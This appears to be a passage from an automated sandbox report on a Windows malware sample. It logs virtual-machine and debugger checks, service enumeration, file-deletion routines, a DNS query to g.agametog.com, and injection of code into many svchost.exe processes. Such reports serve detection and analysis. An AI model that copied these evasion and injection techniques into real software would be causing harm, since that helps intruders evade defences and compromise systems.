        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04645CA0 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification
        Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-5539
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0464BD60 OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04642FB0 OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,LocalFree,CloseServiceHandle
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF545FD0 OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF54F0B0 OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF54EE60 OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 843
        Source: C:\Windows\System32\svchost.exe | Window / User API: foregroundWindowGot 1753
        Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 2696
        Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 2400
        Source: C:\Windows\SysWOW64\rundll32.exe | API coverage: 4.1 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 3.6 %
        Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046445C0 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW
        Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-5540
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware
        Source: svchost.exe, 00000023.00000000.401771191.000002828DC7D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityVMware Virtual disk SCSI Disk Device{4d36e967-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityDisk driveSCSI\DISK&VEN_ASZ_H8X2&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000System.String[](Standard disk drives)VMware Virtual disk SCSI Disk DeviceDiskDriveSCSI\DISK&VEN_BWBD8LVF&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000diskOKWin32_ComputerSystemcomputerBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
        Source: svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
        Source: svchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%SystemRoot%\System32\wuaueng.dll,-400Hyper-V RAWRSVP UDP Service Provider
        Source: svchost.exe, 00000007.00000000.285559352.0000022BAEE24000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.788593785.0000022BAEE24000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUSER\
        Source: svchost.exe, 00000009.00000002.795608571.00000244FC25B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.289682495.000002D6CB057000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.302890890.000002D6C5829000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.288440245.000002D6C5829000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.532387537.000002D6C5829000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.303692497.000002D6CB057000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.533717540.000002D6CB057000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.790028959.000001F97EA3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.796465205.000001F97F300000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.314619419.000001F97EA3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.312783042.000001F97EA3F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000001E.00000000.373718108.000001E553A29000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: svchost.exe, 0000001E.00000002.790938720.000001E553A55000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11
        Source: svchost.exe, 0000001E.00000000.373718108.000001E553A29000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 0000001E.00000000.373664620.000001E553A13000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}YSTE
        Source: svchost.exe, 0000001E.00000000.373718108.000001E553A29000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
        Source: svchost.exe, 00000014.00000002.788624937.000002468A813000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}DLL
        Source: svchost.exe, 0000001E.00000002.792697018.000001E553B15000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonic\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}DeviceArrival
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000011.00000002.789990310.000001DBFC247000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.309779347.000001DBFC247000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.318161364.000001B6D5429000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.322153579.000001B6D5429000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.791235321.000001B6D5429000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.791599934.000002468A87B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.327334491.000002468A87B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.792236508.0000025138C85000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.333950039.0000025138C85000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.344356398.00000226F8029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.789446404.00000226F8029000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: svchost.exe, 0000001B.00000002.790798293.00000236F2C29000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
        Source: svchost.exe, 00000009.00000002.793984392.00000244FC213000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (5>OVMware, Inc.mxwlxu uagcxoqgijvg 2.0
        Source: svchost.exe, 0000001E.00000000.373979106.000001E553A89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000012.00000000.314586977.000001F97EA29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.789558608.000001F97EA29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.312702120.000001F97EA29000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0L
        Source: svchost.exe, 0000001E.00000002.790140368.000001E553A3F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}
        Source: svchost.exe, 0000000B.00000000.289708196.000002D6CB064000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.533761701.000002D6CB064000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.303708302.000002D6CB064000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Hyper-V RAW
        Source: svchost.exe, 0000001E.00000000.373664620.000001E553A13000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000023.00000000.401771191.000002828DC7D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Device
        Source: svchost.exe, 00000023.00000000.401771191.000002828DC7D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00
        Source: svchost.exe, 0000001E.00000000.373664620.000001E553A13000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareGDRBL3HKWin32_VideoController_49HMPBSVideoController120060621000000.000000-00051069914display.infMSBDAFMN7BN6OPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsPKDUZO57
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ,@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000023.00000000.401771191.000002828DC7D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityNECVMWar VMware SATA CD00{4d36e965-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityCD-ROM DriveSCSI\CDROM&VEN_NECVMWAR&PROD_RX_7ANUM_SATA_CD00\5&280B647&0&000000System.String[](Standard CD-ROM drives)NECVMWar VMware SATA CD00CDROMSCSI\CDROM&VEN_NECVMWAR&PROD_9UH16YZX_SATA_CD00\5&280B647&0&000000cdromOKWin32_ComputerSystemcomputerBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: stringComputer System ProductComputer System Product74PV5N20D83542-CB48-FFC7-AA5E-D037A04953D7VMware, Inc.None
        Source: svchost.exe, 00000009.00000003.289880851.00000244FC2AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.mxwlxu uagcxoqgijvg 2.0
        Source: svchost.exe, 00000009.00000002.793984392.00000244FC213000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@"(
        Source: C:\Windows\System32\svchost.exe | Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0464B0C0 GetTickCount,GetCurrentProcessId,gethostname,GetSystemInfo,RegOpenKeyW,RegQueryValueExW,RegCloseKey,GlobalMemoryStatusEx,CoInitialize
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04634C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04634E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046356D0 FindFirstFileW,FindClose
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046357F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04636A40 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046342B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF5363F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF534AE3 FindFirstFileW,FindClose
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF534B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF537A30 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF5349FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF5706D8 FindFirstFileExA
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF5357B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF54AE20 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF535E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,std::_Xinvalid_argument,std::_Xinvalid_argument
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040AF60 LoadLibraryA,GetProcAddress,_memset,ShellExecuteExW
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0465F37F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402EBF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF55BA64 GetLastError,IsDebuggerPresent,OutputDebugStringW
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040185D GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,___crtGetCommandLineW,___crtGetEnvironmentStringsW,__wsetargv,__amsg_exit,__wsetenvp,__amsg_exit,__cinit,__amsg_exit
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04641D40 SetEvent,InterlockedExchange,BlockInput,BlockInput,BlockInput
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406F1E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_LocaleUpdate::_LocaleUpdate,__isctype_l
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00407DC8 SetUnhandledExceptionFilter,__encode_pointer
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00407DEA __decode_pointer,SetUnhandledExceptionFilter
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040158C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0465ED1C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0465667E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04655EB6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF56411C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF55B5A4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\System32\svchost.exe | Domain query: g.agametog.com
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22BAF470000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2D6CAF50000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DBFC860000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F97F060000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B6D5F40000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2468AF80000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25139740000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 226F8C80000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 195989A0000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 236F3320000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 24E71DB0000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F1ED140000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E554130000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1AF62F80000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23E48FA0000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DD8F7B0000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2828E500000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 151ABB60000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 12DBC450000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04649910 WaitForSingleObject,GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,CloseHandle,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: AF470000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: CAF50000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: FC860000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 7F060000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: D5F40000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8AF80000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 39740000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F8C80000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 989A0000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F3320000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 71DB0000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: ED140000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 54130000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 62F80000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 48FA0000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8F7B0000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8E500000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: ABB60000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: BC450000
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 22BAF470000
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D6CAF50000
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFC860000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1F97F060000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1B6D5F40000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2468AF80000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 25139740000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 226F8C80000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 195989A0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 236F3320000Jump to behavior
